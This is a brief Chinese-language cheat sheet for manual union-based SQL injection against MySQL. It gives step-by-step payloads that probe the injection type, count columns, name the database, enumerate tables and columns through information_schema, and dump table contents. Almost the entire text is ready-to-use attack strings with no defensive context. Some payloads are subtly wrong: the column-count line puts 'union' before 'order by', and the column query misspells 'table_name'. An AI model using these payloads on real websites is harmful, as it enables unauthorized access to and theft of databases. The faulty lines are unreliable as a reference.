(1)先输入1 ' 判断是什么类型的注入,若是整形,一般会报这种错:Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 1 0.000 sec;
若是字符型,一般会报这种错:Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’’ at line 1 0.016 sec
(2)确定表中的列
1’ and 1=2 union order by xxx #(一直加,直到报错)
(3)确定数据库名(这里以三列为例)
1' and 1=2 union select 1, 2, database() #
(4) 确定表名
1’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
(5)确定列名
1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where tabe_name='你想查的表' #
(6)获取数据
1' and 1=2 union select xxx,xxx from 表 #